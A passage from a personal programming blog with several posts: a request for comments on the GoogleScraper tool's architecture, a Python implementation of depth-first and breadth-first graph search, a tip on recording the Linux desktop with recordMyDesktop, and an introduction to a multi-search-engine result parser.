    <span class="n">run</span><span class="p">(</span><span class="n">engine</span><span class="p">)</span>
</code></pre></div>A lot of work to do for GoogleScraper in the future and request for comments!2015-03-01T12:52:00+01:002015-03-01T12:52:00+01:00Nikolai Tschachertag:incolumitas.com,2015-03-01:/2015/03/01/a-lot-of-work-to-do-for-googlescraper-in-the-future-and-request-for-comments/<p>Hello dear readers</p>
<p>I get a lot of mail with questions about GoogleScraper. I really
appreciate it, but at some point I can no longer answer all of it. In the
last few weeks I didn't have much time (or, I must admit, motivation) to
put into GoogleScraper.</p>
<p>The reason is that I am still uncomfortable with the architecture of
GoogleScraper. There are basically two ways to use the tool:</p>
<ul>
<li>As a command line tool</li>
<li>From another program over the API (programming approach)</li>
</ul>
<p>Furthermore, GoogleScraper runs in three very different modes:</p>
<ul>
<li>http mode</li>
<li>selenium mode, which in turn can be divided into Firefox, Chrome and
PhantomJS selenium browsers</li>
<li>asynchronous mode</li>
</ul>
<p>Of these, I think selenium is the hardest to work with (very buggy
and complex to program against). This leads to a complex software
architecture, mainly because the two operational modes (CLI tool and
API) have <em>different priorities for handling exceptions</em>.</p>
<p>The CLI tool should be VERY robust and should do everything it can to
continue scraping with the remaining resources (proxies, RAM when
lots of selenium instances become an issue, network bandwidth, ...),
because users cannot handle these problems themselves when they call
GoogleScraper from the command line. It's better to keep running
until we just can't anymore (no more proxies, network failure, ...).</p>
<p>The API, on the other hand, should return the results of individual
workers to the caller as soon as possible. The API user may even
want to stop GoogleScraper as soon as some sort of problem appears
(for example, when a proxy is detected).</p>
<p>These are two fundamentally different approaches, and to guarantee that
both work, a very sophisticated middleware architecture is needed. To be
honest, when I started GoogleScraper I wasn't aware of these
differences.</p>
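<p>To make the difference concrete, here is a minimal sketch of how one
job loop could serve both priorities through a switchable error policy. The
names <code>ErrorPolicy</code>, <code>ScrapeError</code>, <code>run_jobs</code> and
<code>flaky_worker</code> are hypothetical and not part of GoogleScraper; this is
an illustration under those assumptions, not the actual design.</p>

```python
from enum import Enum


class ErrorPolicy(Enum):
    KEEP_GOING = "keep_going"  # CLI style: skip failed jobs, continue with the rest
    FAIL_FAST = "fail_fast"    # API style: surface the first problem to the caller


class ScrapeError(Exception):
    """Hypothetical error raised by a worker (blocked proxy, network failure, ...)."""


def run_jobs(jobs, worker, policy):
    """Yield (job, result) pairs as soon as each worker call finishes."""
    failed = []
    for job in jobs:
        try:
            result = worker(job)
        except ScrapeError as err:
            if policy is ErrorPolicy.FAIL_FAST:
                raise  # let the API caller decide what to do
            failed.append((job, err))  # remember the failure and keep scraping
            continue
        yield job, result
    if failed:
        print("skipped {} job(s): {}".format(len(failed), [job for job, _ in failed]))


def flaky_worker(keyword):
    """Stand-in for a real scrape worker; fails for one special keyword."""
    if keyword == "blocked":
        raise ScrapeError("proxy detected")
    return "results for " + keyword


if __name__ == "__main__":
    for job, result in run_jobs(["a", "blocked", "b"], flaky_worker, ErrorPolicy.KEEP_GOING):
        print(job, "->", result)
```

<p>Because <code>run_jobs</code> is a generator, the caller receives each result
as soon as it exists, and in fail-fast mode the exception arrives at exactly
the point where the problem occurred.</p>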
<h3>Which tools to use?</h3>
<p>Another issue is the technology I currently use. I realized from
discussions with people who are interested in GoogleScraper that
there is a lot of good and stable software out there that could help me.
Right now I use hand-crafted caching to store scraped data. But honestly,
it would be much faster and less error-prone to switch to Redis or
a similar technology. <a href="https://github.com/andymccurdy/redis-py" title="this python redis client">The python redis
client</a>
looks very promising and would help me improve the performance of
GoogleScraper immensely.</p>
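<p>A rough sketch of what such a cache could look like. It only assumes a
client object with <code>get(key)</code> and <code>set(key, value, ex=seconds)</code>,
which is the shape of the redis-py client; the class <code>ResultCache</code>, the
key layout and the in-memory <code>FakeClient</code> are my own assumptions for
illustration, so the example runs without a Redis server.</p>

```python
import hashlib
import json


class ResultCache:
    """Cache scraped results under a key derived from the search parameters."""

    def __init__(self, client, ttl_seconds=3600):
        self.client = client            # anything with get() and set(..., ex=...)
        self.ttl_seconds = ttl_seconds  # how long an entry should stay valid

    @staticmethod
    def key_for(search_engine, keyword, page):
        # Hash the parameters so that arbitrary keywords give a safe, fixed-size key.
        raw = json.dumps([search_engine, keyword, page]).encode("utf-8")
        return "serp:" + hashlib.sha256(raw).hexdigest()

    def get(self, search_engine, keyword, page):
        cached = self.client.get(self.key_for(search_engine, keyword, page))
        if cached is None:
            return None
        if isinstance(cached, bytes):   # a real Redis client returns bytes by default
            cached = cached.decode("utf-8")
        return json.loads(cached)

    def put(self, search_engine, keyword, page, results):
        key = self.key_for(search_engine, keyword, page)
        self.client.set(key, json.dumps(results), ex=self.ttl_seconds)


class FakeClient:
    """In-memory stand-in for a Redis client; it ignores the expiry time."""

    def __init__(self):
        self.store = {}

    def get(self, key):
        return self.store.get(key)

    def set(self, key, value, ex=None):
        self.store[key] = value


if __name__ == "__main__":
    cache = ResultCache(FakeClient())
    cache.put("google", "python", 1, ["https://www.python.org/"])
    print(cache.get("google", "python", 1))
```

<p>With a running Redis server, <code>FakeClient()</code> would be swapped for
<code>redis.Redis()</code> from redis-py, and expiry would then be handled by
Redis itself.</p>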
<p>I am quite sure that there is other software that I <em>should</em> use but am
currently unaware of. Please, kind people: <strong>Shoot me a short comment if
you have hints or ideas about which software I absolutely must
use!</strong></p>
<p>Before I begin programming I want to plan ahead and define some
milestones I want to reach. Currently I am reading a book about test
driven development and I feel that I have to read at least these two
books before I continue with GoogleScraper:</p>
<ul>
<li><a href="http://pages.cs.wisc.edu/~remzi/OSTEP/" title="operating systems book">Operating system
book</a></li>
<li><a href="http://chimera.labs.oreilly.com/books/1234000000754/index.html" title="test driven development">Test driven development
book</a></li>
</ul>
<p>Otherwise I will make further mistakes and never arrive at stable
and mature software. And I think people would like to use such a
tool. I got 450 stars on GitHub over the last year and I feel like there
is a lot of interest in this area. And I want to be the man who delivers
such a tool :)</p>
<h3>Please help me!</h3>
<p>This may sound a bit hypocritical because all of you have already helped me a
great deal (and I still have around 30 issues to resolve on GitHub), but
I especially need some tips about the architecture and ideas on how to
design the framework of GoogleScraper. Please leave some comments :)</p>
<p>Best Regards</p>
<p>Nikolai</p>
<p><strong>This post is not completed yet. I will update it and use it as a rough
outline for improvements of GoogleScraper</strong></p>Implementing two Graph traversal algorithms in Python: Depth First Search and Breadth First Search2015-01-24T19:40:00+01:002015-01-24T19:40:00+01:00Nikolai Tschachertag:incolumitas.com,2015-01-24:/2015/01/24/implementing-two-graph-traversal-algorithms-in-python-depth-first-search-and-breadth-first-search/<h3>Depth First Search and Breadth First Search</h3>
<p>I am facing a ton of exams and I need to learn about
algorithms and data structures. When I read the pseudocode of graph
traversal algorithms, I thought:<br>
Why not actually implement them in a real programming language? So I
did, and now you can study my code here. I guess this problem has been
solved a thousand times before, but I learnt something and I hope my
approach has some uniqueness to it.</p>
<p>Additionally, you can generate a topological order after you have
traversed the whole graph, which is a nice little extra.</p>
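<p>As a compact illustration of that extra, here is a minimal sketch that
derives a topological order from depth-first search by reversing the order in
which nodes finish. It assumes the graph is a plain dict mapping each node to
a list of successors and that it has no cycles; the function name
<code>topological_order</code> and the sample data are made up for this example
and are not taken from the repository.</p>

```python
def topological_order(graph):
    """Return the nodes of a directed acyclic graph so that every edge points forward."""
    WHITE, GREY, BLACK = 0, 1, 2   # unvisited, discovered, finished
    state = {node: WHITE for node in graph}
    finished = []                  # nodes in order of increasing finishing time

    def visit(node):
        state[node] = GREY
        for neighbor in graph.get(node, []):
            if state.get(neighbor, WHITE) == GREY:
                # A discovered but unfinished neighbor means we found a back edge.
                raise ValueError("graph has a cycle, no topological order exists")
            if state.get(neighbor, WHITE) == WHITE:
                visit(neighbor)
        state[node] = BLACK
        finished.append(node)

    for node in graph:
        if state[node] == WHITE:
            visit(node)
    # The node that finishes last has no unprocessed predecessors, so reverse.
    return finished[::-1]


# Sample data (made up): an edge u -> v means "put on u before v".
clothes = {
    "shirt": ["tie"],
    "tie": ["jacket"],
    "trousers": ["shoes", "jacket"],
    "shoes": [],
    "jacket": [],
}

if __name__ == "__main__":
    print(topological_order(clothes))
```

<p>The three states correspond to the values 0, 1 and 2 of the
<code>visited</code> property in the full code. The recursion keeps the sketch
short, but very deep graphs would need an explicit stack.</p>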
<p>If you want the most recent version of the code, you can visit its own
<a href="https://github.com/NikolaiT/TraversingGraphs" title="github repo">Github repo
here</a>.</p>
<p>Well, here's the code. Just download and run it like this: <code>python graph_traversal.py</code></p>
<div class="highlight"><pre><span></span><code><span class="c1"># -*- coding: utf-8 -*-</span>
<span class="n">__author__</span> <span class="o">=</span> <span class="s1">'Nikolai Tschacher'</span>
<span class="n">__version__</span> <span class="o">=</span> <span class="s1">'0.1'</span>
<span class="n">__contact__</span> <span class="o">=</span> <span class="s1">'admin@incolumitas.com'</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">from</span> <span class="nn">collections</span> <span class="kn">import</span> <span class="n">deque</span>
<span class="sd">"""</span>
<span class="sd">This is just a little representation of two basic graph traversal methods.</span>
<span class="sd"> - Depth-First-Search</span>
<span class="sd"> - Breadth-First-Search</span>
<span class="sd">It's by no means meant to be fast or performant. Rather it is for educational</span>
<span class="sd">purposes and to understand it better for myself.</span>
<span class="sd">"""</span>
<span class="k">class</span> <span class="nc">Node</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span>
    <span class="sd">"""Represents a node."""</span>
    <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">name</span><span class="p">):</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">name</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">_visited</span> <span class="o">=</span> <span class="mi">0</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">discovery_time</span> <span class="o">=</span> <span class="kc">None</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">finishing_time</span> <span class="o">=</span> <span class="kc">None</span>

    <span class="k">def</span> <span class="nf">neighbors</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">adjacency_list</span><span class="p">):</span>
        <span class="k">return</span> <span class="n">adjacency_list</span><span class="p">[</span><span class="bp">self</span><span class="p">]</span>

    <span class="nd">@property</span>
    <span class="k">def</span> <span class="nf">visited</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">return</span> <span class="bp">self</span><span class="o">.</span><span class="n">_visited</span>

    <span class="nd">@visited</span><span class="o">.</span><span class="n">setter</span>
    <span class="k">def</span> <span class="nf">visited</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">value</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">discovery_time</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">perf_counter</span><span class="p">()</span>
        <span class="k">elif</span> <span class="n">value</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">finishing_time</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">perf_counter</span><span class="p">()</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">_visited</span> <span class="o">=</span> <span class="n">value</span>

    <span class="k">def</span> <span class="fm">__str__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">return</span> <span class="nb">str</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">name</span><span class="p">)</span>

    <span class="k">def</span> <span class="fm">__repr__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">return</span> <span class="nb">str</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">name</span><span class="p">)</span>
<span class="c1"># Let's define our sample graph and represent it in an adjacency list.</span>
<span class="c1"># This means that for every node, we store the outgoing edges in a list.</span>
<span class="n">Nodes</span> <span class="o">=</span> <span class="p">[</span><span class="n">Node</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">10</span><span class="p">)]</span>
<span class="n">Graph</span> <span class="o">=</span> <span class="p">{</span>
    <span class="n">Nodes</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">5</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">3</span><span class="p">]],</span>
    <span class="n">Nodes</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">8</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">3</span><span class="p">]],</span>
    <span class="n">Nodes</span><span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">5</span><span class="p">]],</span>
    <span class="n">Nodes</span><span class="p">[</span><span class="mi">3</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">9</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">8</span><span class="p">]],</span>
    <span class="n">Nodes</span><span class="p">[</span><span class="mi">4</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">5</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">2</span><span class="p">]],</span>
    <span class="n">Nodes</span><span class="p">[</span><span class="mi">5</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">9</span><span class="p">]],</span>
    <span class="n">Nodes</span><span class="p">[</span><span class="mi">6</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">9</span><span class="p">]],</span>
    <span class="n">Nodes</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">5</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">6</span><span class="p">]],</span>
    <span class="n">Nodes</span><span class="p">[</span><span class="mi">8</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">9</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">4</span><span class="p">]],</span>
    <span class="n">Nodes</span><span class="p">[</span><span class="mi">9</span><span class="p">]:</span> <span class="p">[</span><span class="n">Nodes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">Nodes</span><span class="p">[</span><span class="mi">1</span><span class="p">]],</span>
<span class="p">}</span>
<span class="sd">"""</span>
<span class="sd">Depth-First-Search</span>
<span class="sd">Running time: O(|V| + |E|)</span>
<span class="sd">"""</span>
<span class="c1"># visited states: 0 = unvisited, 1 = discovered, 2 = finished</span>
<span class="k">def</span> <span class="nf">depth_first_search</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">Nodes</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">node</span> <span class="ow">in</span> <span class="n">Nodes</span><span class="p">:</span>
        <span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="k">for</span> <span class="n">node</span> <span class="ow">in</span> <span class="n">Nodes</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
            <span class="n">depth_first_search_visit</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">node</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">depth_first_search_visit</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">node</span><span class="p">):</span>
    <span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">=</span> <span class="mi">1</span>
    <span class="k">for</span> <span class="n">neighbor</span> <span class="ow">in</span> <span class="n">node</span><span class="o">.</span><span class="n">neighbors</span><span class="p">(</span><span class="n">Graph</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">neighbor</span><span class="o">.</span><span class="n">visited</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
            <span class="n">depth_first_search_visit</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">neighbor</span><span class="p">)</span>
    <span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">=</span> <span class="mi">2</span>

<span class="sd">"""</span>
<span class="sd">Breadth-First-Search</span>
<span class="sd">"""</span>
<span class="k">def</span> <span class="nf">breadth_first_search</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">Nodes</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">node</span> <span class="ow">in</span> <span class="n">Nodes</span><span class="p">:</span>
        <span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="k">for</span> <span class="n">node</span> <span class="ow">in</span> <span class="n">Nodes</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
            <span class="n">breadth_first_search_visit</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">node</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">breadth_first_search_visit</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">node</span><span class="p">):</span>
    <span class="n">node</span><span class="o">.</span><span class="n">visited</span> <span class="o">=</span> <span class="mi">1</span>
    <span class="n">queue</span> <span class="o">=</span> <span class="n">deque</span><span class="p">([</span><span class="n">node</span><span class="p">])</span>
    <span class="c1"># Process the discovered nodes in FIFO order until the queue is empty.</span>
    <span class="k">while</span> <span class="n">queue</span><span class="p">:</span>
        <span class="n">u</span> <span class="o">=</span> <span class="n">queue</span><span class="o">.</span><span class="n">popleft</span><span class="p">()</span>
        <span class="k">for</span> <span class="n">neighbor</span> <span class="ow">in</span> <span class="n">u</span><span class="o">.</span><span class="n">neighbors</span><span class="p">(</span><span class="n">Graph</span><span class="p">):</span>
            <span class="k">if</span> <span class="n">neighbor</span><span class="o">.</span><span class="n">visited</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
                <span class="n">neighbor</span><span class="o">.</span><span class="n">visited</span> <span class="o">=</span> <span class="mi">1</span>
                <span class="n">queue</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">neighbor</span><span class="p">)</span>
        <span class="c1"># u is finished once all of its neighbors have been discovered.</span>
        <span class="n">u</span><span class="o">.</span><span class="n">visited</span> <span class="o">=</span> <span class="mi">2</span>

<span class="k">def</span> <span class="nf">print_topological</span><span class="p">(</span><span class="n">Nodes</span><span class="p">):</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">'Topological sort of the Graph:'</span><span class="p">)</span>
    <span class="c1"># prints a topological sort</span>
    <span class="k">for</span> <span class="n">node</span> <span class="ow">in</span> <span class="nb">sorted</span><span class="p">(</span><span class="n">Nodes</span><span class="p">,</span> <span class="n">key</span><span class="o">=</span><span class="k">lambda</span> <span class="n">obj</span><span class="p">:</span> <span class="n">obj</span><span class="o">.</span><span class="n">finishing_time</span><span class="p">):</span>
        <span class="nb">print</span><span class="p">(</span><span class="s1">'</span><span class="se">\t</span><span class="s1"> </span><span class="si">{}</span><span class="s1">: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">node</span><span class="p">,</span> <span class="n">node</span><span class="o">.</span><span class="n">finishing_time</span><span class="p">))</span>

<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">'Using Depth-First-Search'</span><span class="p">)</span>
    <span class="c1"># should print each node exactly once</span>
    <span class="n">depth_first_search</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">Nodes</span><span class="p">)</span>
    <span class="n">print_topological</span><span class="p">(</span><span class="n">Nodes</span><span class="p">)</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="c1"># the same, but with Breadth-First-Search</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">'Using Breadth-First-Search'</span><span class="p">)</span>
    <span class="n">breadth_first_search</span><span class="p">(</span><span class="n">Graph</span><span class="p">,</span> <span class="n">Nodes</span><span class="p">)</span>
    <span class="n">print_topological</span><span class="p">(</span><span class="n">Nodes</span><span class="p">)</span>
</code></pre></div>Very good program to record audio and desktop on Linux!2015-01-18T15:04:00+01:002015-01-18T15:04:00+01:00Nikolai Tschachertag:incolumitas.com,2015-01-18:/2015/01/18/very-good-program-to-record-audio-and-desktop-on-linux/<h3>First post in the new year!</h3>
<p>Hey</p>
<p>Happy new year to all of you, and let 2015 be a successful year for us
all!</p>
<p>My <strong>New Year's resolution</strong> is to write at least two blog posts every
month and try to get my scraping service on
<a href="http://scrapeulous.com" title="my scraping service">scrapeulous.com</a> up and
running!</p>
<h3>Good program to record the desktop/audio on Linux</h3>
<p>But what I really wanted to share today is an awesome way to record your
desktop with audio on Linux. I tried my luck several times with VLC, but
it's a freaking pain in the ass to use. Furthermore, VLC will probably
never be able to capture the desktop with audio (see <a href="http://superuser.com/questions/612186/how-to-capture-screen-video-with-audio-using-vlc-media-player">this Super User
thread</a>
for more info).</p>
<p>But I just found a wonderful alternative (one could almost assume that
I am advertising, which is not the case, I swear!):</p>
<p><a href="http://wiki.ubuntuusers.de/recordMyDesktop">http://wiki.ubuntuusers.de/recordMyDesktop</a></p>
<p>If you want to visit the home page of the program, <a href="http://recordmydesktop.sourceforge.net/about.php">click
here</a>. Although the
home page is very ugly and the program is no longer in active
development, it just works like a charm. On Ubuntu you can install it
like this:</p>
<p><code>sudo apt-get install recordmydesktop</code></p>
<p>Then go to the directory where you want to save the output file and just
enter <code>recordmydesktop</code> in a shell.</p>
<p>The program begins to record. When you hit Control-C, the capture stops
and the file is written (which takes a bit of time). Then you can play your
capture (with VLC, for example).</p>
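<p>If you would rather start and stop a recording from a script, the same steps can be sketched in Python. This is only a minimal sketch under a few assumptions: <code>recordmydesktop</code> is installed and on the <code>PATH</code>, its <code>-o</code> option is used to pick the output file, and the helper names <code>build_record_command</code> and <code>record_desktop</code> as well as the file name are made up for illustration.</p>

```python
import signal
import subprocess
import time


def build_record_command(output_file):
    """Return the argument list for a recordmydesktop call (hypothetical helper)."""
    return ['recordmydesktop', '-o', output_file]


def record_desktop(output_file, seconds):
    """Record for roughly `seconds` seconds, then stop the way Control-C would."""
    process = subprocess.Popen(build_record_command(output_file))
    try:
        time.sleep(seconds)
    finally:
        # SIGINT is the signal a terminal sends on Control-C. The program then
        # stops capturing and writes the file, which can take a while.
        process.send_signal(signal.SIGINT)
        process.wait()
    return process.returncode


# Example call (commented out, because it needs a running desktop session):
# record_desktop('screencast.ogv', seconds=10)
```

<p>Waiting for the process to exit matters here, because the file is only complete once the encoding step after the interrupt has finished.</p>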
<h3>Conclusion</h3>
<p>This shows me once more what the most integral parts in the art of
software development really are:</p>
<ul>
<li>The most common use case of the program should be its default
behaviour!</li>
<li>Usability is the most important part of any software. Users get
frustrated very easily.</li>
<li>The program must be robust. If it doesn't work, potential customers
are lost to the competition!</li>
</ul>
<p>All these points apply to recordmydesktop, which makes it very nice to
work with!</p>
<p>Hope you got something out of this.</p>Scraping and Extracting Links from any major Search Engine like Google, Yandex, Baidu, Bing and Duckduckgo2014-11-12T00:47:00+01:002014-11-12T00:47:00+01:00Nikolai Tschachertag:incolumitas.com,2014-11-12:/2014/11/12/scraping-and-extracting-links-from-any-major-search-engine-like-google-yandex-baidu-bing-and-duckduckgo/<h3>Prelude</h3>
<p>It's been quite a while since I last worked on my projects. But recently I
had some motivation and energy left, which is quite nice considering my
full-time university week and a programming job on the side.</p>
<p>I have a <a href="https://github.com/NikolaiT/GoogleScraper" title="GoogleScraper">little project on
GitHub</a> that
I have worked on every now and again over the last year or so. Recently it got
a little bit bigger (I have 115 GitHub stars now, I would never have
imagined achieving this) and I receive up to two emails with job
offers every week (sorry if I cannot accept your request :( ).</p>
<p>But unfortunately my progress with this project is not as good as I want
it to be (that's probably quite a common feeling among us programmers).
The problem isn't a lack of ideas and features that I want to
implement; the hard part is extending the project without breaking legacy
code. GoogleScraper has grown organically and I am wasting <strong>a
lot</strong> of time trying to understand my old code. Often it's much better to just
erase whole modules and reimplement them from scratch. This is
essentially what I did with the parsing module.</p>
<h3>Parsing SERP pages with many search engines</h3>
<p>So I rewrote the parsing.py module of GoogleScraper. From now on,
parsing is much more stable and easier to extend. In fact,
anyone can add their own CSS selectors by subclassing the abstract
<code>Parser</code> class. For now, parsing.py supports the following search
engines:</p>
<ul>
<li><a href="https://google.com">Google</a> (as before)</li>
<li><a href="http://yandex.ru/" title="Yandex">Yandex</a> (quite a nice search engine)</li>
<li><a href="http://www.bing.com" title="Bing">Bing</a> (pretty mature by now)</li>
<li><a href="https://search.yahoo.com" title="Yahoo">Yahoo</a> (good old Google
competitor)</li>
<li><a href="http://www.baidu.com/" title="Baidu">Baidu</a> (let's dive into the Asian
market ;) )</li>
<li><a href="https://duckduckgo.com" title="Duckduckgo">Duckduckgo</a> (I am very excited
about Duckduckgo, because the results are clean and very easily
parsable)</li>
</ul>
<p>This means that GoogleScraper now supports <strong>6 search engines</strong>. So you
can scale your scraping and compare the results between search engines.
This means much more output and statistical data for your analysis. You
can also split your scrape jobs across the different search engines. A few
people might still say that Google is the only usable search engine.
Have you actually used an alternative recently or are you just suffering
from the <a href="http://en.wikipedia.org/wiki/Lock-in_%28decision-making%29">lock-in
effect</a>?</p>
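<p>To make the idea of adding your own CSS selectors a bit more concrete, here is a small standalone sketch. It does not import GoogleScraper; it only mimics the dictionary layout that the parsing code further down iterates over (a <code>container</code>, a <code>result_container</code> and one selector per field, each ending in <code>::text</code> or <code>::attr(...)</code>). The selector values and the helper names <code>split_pseudo_selector</code> and <code>fields_to_extract</code> are hypothetical and not part of the real module.</p>

```python
import re

# Hypothetical selectors for an imaginary search engine. 'container' and
# 'result_container' locate each result; every other key names a field
# that is extracted with a ::text or ::attr(...) pseudo selector.
example_search_selectors = {
    'results': {
        'container': '#results',
        'result_container': 'li.result',
        'link': 'h3 > a::attr(href)',
        'title': 'h3 > a::text',
        'snippet': 'p.snippet::text',
    },
}


def split_pseudo_selector(selector):
    """Split a selector into (plain_css, kind, attribute_name)."""
    if selector.endswith('::text'):
        return selector[:-len('::text')], 'text', None
    match = re.search(r'^(?P<css>.*)::attr\((?P<attr>.*)\)$', selector)
    if match:
        return match.group('css'), 'attr', match.group('attr')
    return selector, None, None


def fields_to_extract(selectors):
    """Return the field selectors, i.e. everything except the container keys."""
    return {key: value for key, value in selectors.items()
            if key not in ('container', 'result_container')}


for field, selector in sorted(fields_to_extract(example_search_selectors['results']).items()):
    print(field, split_pseudo_selector(selector))
```

<p>The plain CSS part is what would be translated to XPath, while the pseudo selector only decides whether the text content or an attribute of the matched element is read.</p>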
<h3>Let's play with it</h3>
<p>Well, to give you a first insight into the new functionality, let's dig
into some code and see it in action:</p>
<p>To run it, download the code below, save it as parsing.py and
install these modules:</p>
<ul>
<li>lxml</li>
<li>cssselect</li>
<li>beautifulsoup4</li>
</ul>
<p>You can do so with <code>sudo pip3 install modulename</code>.</p>
<p>When you are ready, you can easily test the new parsing
functionality by running an example command like this on
the command line:</p>
<p><code>python3 parsing.py 'http://yandex.ru/yandsearch?text=GoogleScraper&lr=178'</code></p>
<p>This will scrape the results from Yandex for the search query
<strong>GoogleScraper</strong>. You can try it out with the other search engines:
Just search in your browser, then copy and paste the URL from the
address bar into the command!</p>
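<p>If you prefer to build such a URL in code instead of copying it from the browser, a rough sketch could look like this. The parameter names <code>text</code> and <code>lr</code> are simply taken from the example command above; the function names and the host name matching in <code>guess_search_engine</code> are assumptions made for illustration and are not how parsing.py necessarily does it.</p>

```python
from urllib.parse import urlencode, urlparse

KNOWN_ENGINES = ('google', 'yandex', 'bing', 'yahoo', 'baidu', 'duckduckgo')


def build_yandex_url(query, lr=178):
    """Build a Yandex search URL like the one in the example command."""
    # 'text' and 'lr' are copied from the example URL shown above.
    return 'http://yandex.ru/yandsearch?' + urlencode({'text': query, 'lr': lr})


def guess_search_engine(url):
    """Guess the search engine from the host name of a pasted URL."""
    host = urlparse(url).hostname or ''
    labels = host.split('.')
    for engine in KNOWN_ENGINES:
        if engine in labels:
            return engine
    return None


url = build_yandex_url('GoogleScraper')
print(url, guess_search_engine(url))
```

<p><code>urlencode</code> also takes care of escaping spaces and special characters in the query, which is easy to get wrong when pasting URLs by hand.</p>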
<p>Please note: Using this module on its own makes little sense, because
requesting such URLs
directly without imitating a real browser (which my
GoogleScraper module does by faking the User-Agent, using selenium, PhantomJS,
...) sometimes makes
the search engines return crippled HTML, which is hard
to parse.</p>
<p>But for some engines it nevertheless works quite well (for example:
Yandex, Google, ...).</p>
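<p>As a rough illustration of what "imitating a real browser" can mean in its simplest form, the following sketch sets a browser-like User-Agent header with the standard library. It is not the approach GoogleScraper itself takes (that involves selenium and PhantomJS, among other things); the User-Agent string and the function names are made up for this example.</p>

```python
import urllib.request

# Hypothetical browser-like User-Agent string; any realistic value would do.
BROWSER_USER_AGENT = 'Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0'


def build_browser_like_request(url, user_agent=BROWSER_USER_AGENT):
    """Create a request object that carries a browser-like User-Agent header."""
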